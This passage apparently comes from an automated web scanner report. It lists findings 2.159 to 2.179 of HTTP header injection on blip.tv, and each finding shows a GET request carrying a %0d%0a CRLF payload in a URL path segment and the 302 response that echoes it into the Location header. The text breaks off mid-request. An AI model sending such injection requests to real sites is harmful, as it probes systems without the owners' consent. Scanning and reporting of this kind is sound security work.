Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/c4bba
09ac88edd77

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 344225290
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/c4bba
09ac88edd77"
...[SNIP]...

2.159. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39861%0d%0a701665a5f12 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39861%0d%0a701665a5f12/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/39861
701665a5f12
/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 2146043821
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/39861
701665a5f12/get/VZW-O
...[SNIP]...

2.160. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c8150%0d%0aa8ef03bb86d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/c8150%0d%0aa8ef03bb86d/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/c8150
a8ef03bb86d
/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 355
Date: Thu, 20 Jan 2011 00:38:15 GMT
X-Varnish: 1498215037
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/c8150
a8ef03bb86d/VZW-
...[SNIP]...

2.161. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6c82d%0d%0a93977621bdf was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/6c82d%0d%0a93977621bdf HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/6c82d
93977621bdf

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:15 GMT
X-Varnish: 1274880099
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/6c82d
93977621bdf"
...[SNIP]...

2.162. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b735a%0d%0a4b73dce7fd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b735a%0d%0a4b73dce7fd6/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/b735a
4b73dce7fd6
/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1025265053
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/b735a
4b73dce7fd6/get/VZW-O
...[SNIP]...

2.163. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c53d4%0d%0aaced57da6fc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/c53d4%0d%0aaced57da6fc/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/c53d4
aced57da6fc
/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 340
Date: Thu, 20 Jan 2011 00:38:15 GMT
X-Varnish: 1248903439
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/c53d4
aced57da6fc/VZW-
...[SNIP]...

2.164. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload fff71%0d%0a9caf11d87e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/fff71%0d%0a9caf11d87e HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/fff71
9caf11d87e

Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:15 GMT
X-Varnish: 1025265146
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/fff71
9caf11d87e">
...[SNIP]...

2.165. http://blip.tv/file/post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/post/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1cec9%0d%0aaea8b0a57c0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1cec9%0d%0aaea8b0a57c0/post/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/1cec9
aea8b0a57c0
/post/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1498217007
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/1cec9
aea8b0a57c0/post/">he
...[SNIP]...

2.166. http://blip.tv/file/post/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/post/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b447b%0d%0aae2ca8874c8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b447b%0d%0aae2ca8874c8/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/b447b
ae2ca8874c8
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 299
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1025267076
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b447b
ae2ca8874c8/">he
...[SNIP]...

2.167. http://blip.tv/file/view/4639878 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/view/4639878

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b1a1%0d%0aafeb6bf68fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b1a1%0d%0aafeb6bf68fb/view/4639878 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/6b1a1
afeb6bf68fb
/view/4639878
Content-Type: text/html; charset=iso-8859-1
Content-Length: 291
Date: Thu, 20 Jan 2011 00:38:30 GMT
X-Varnish: 1248905621
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/6b1a1
afeb6bf68fb/view/4639
...[SNIP]...

2.168. http://blip.tv/file/view/4639878 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/view/4639878

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5e398%0d%0afe6869b45b4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/5e398%0d%0afe6869b45b4/4639878 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/5e398
fe6869b45b4
/4639878
Content-Type: text/html; charset=iso-8859-1
Content-Length: 291
Date: Thu, 20 Jan 2011 00:38:30 GMT
X-Varnish: 1025267239
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/5e398
fe6869b45b4/4639
...[SNIP]...

2.169. http://blip.tv/file/view/4639878 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/view/4639878

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d28f4%0d%0adfc23e7d40b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/view/d28f4%0d%0adfc23e7d40b HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/view/d28f4
dfc23e7d40b

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:30 GMT
X-Varnish: 1324527842
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/view/d28f4
dfc23e7d40b
...[SNIP]...

2.170. http://blip.tv/html5/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /html5/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a5c5e%0d%0aecfd3e1b2e1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a5c5e%0d%0aecfd3e1b2e1/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/a5c5e
ecfd3e1b2e1
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Date: Thu, 20 Jan 2011 00:39:03 GMT
X-Varnish: 1324533224
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/a5c5e
ecfd3e1b2e1/">here</a
...[SNIP]...

2.171. http://blip.tv/opensearch.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /opensearch.xml

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d9557%0d%0a1ccc7956757 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d9557%0d%0a1ccc7956757 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/d9557
1ccc7956757

Content-Type: text/html; charset=iso-8859-1
Content-Length: 293
Date: Thu, 20 Jan 2011 00:38:50 GMT
X-Varnish: 344230656
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/d9557
1ccc7956757">here</a>
...[SNIP]...

2.172. http://blip.tv/play/AYG43E4C [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYG43E4C

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5e893%0d%0afef1a092f91 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5e893%0d%0afef1a092f91/AYG43E4C HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/5e893
fef1a092f91
/AYG43E4C
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 1025269683
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/5e893
fef1a092f91/AYG43E4C"
...[SNIP]...

2.173. http://blip.tv/play/AYG43E4C [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYG43E4C

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8ae4b%0d%0aef261fee625 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/8ae4b%0d%0aef261fee625 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/8ae4b
ef261fee625

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 2146048296
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/8ae4b
ef261fee625">her
...[SNIP]...

2.174. http://blip.tv/play/AYG43E4C/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYG43E4C/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9d9ed%0d%0a1d0190b6bfe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9d9ed%0d%0a1d0190b6bfe/AYG43E4C/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/9d9ed
1d0190b6bfe
/AYG43E4C/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 1498219656
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/9d9ed
1d0190b6bfe/AYG43E4C/
...[SNIP]...

2.175. http://blip.tv/play/AYG43E4C/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYG43E4C/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9b62f%0d%0aafb7f205a9b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/9b62f%0d%0aafb7f205a9b/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/9b62f
afb7f205a9b
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:46 GMT
X-Varnish: 1498219708
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/9b62f
afb7f205a9b/">he
...[SNIP]...

2.176. http://blip.tv/play/AYKO2zcC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKO2zcC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload bef89%0d%0a78a00608a45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bef89%0d%0a78a00608a45/AYKO2zcC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/bef89
78a00608a45
/AYKO2zcC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:48 GMT
X-Varnish: 1324530645
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/bef89
78a00608a45/AYKO2zcC"
...[SNIP]...

2.177. http://blip.tv/play/AYKO2zcC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKO2zcC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload faa16%0d%0ad4d07c4ea2a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/faa16%0d%0ad4d07c4ea2a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/faa16
d4d07c4ea2a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:48 GMT
X-Varnish: 344230345
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/faa16
d4d07c4ea2a">her
...[SNIP]...

2.178. http://blip.tv/play/AYKO2zcC/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKO2zcC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ab7a4%0d%0a628a1e29106 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ab7a4%0d%0a628a1e29106/AYKO2zcC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ab7a4
628a1e29106
/AYKO2zcC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:48 GMT
X-Varnish: 1324530741
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ab7a4
628a1e29106/AYKO2zcC/
...[SNIP]...

2.179. http://blip.tv/play/AYKO2zcC/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKO2zcC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e6eea%0d%0a0a912b6859e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/e6eea%0d%0a0a912b6859e/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
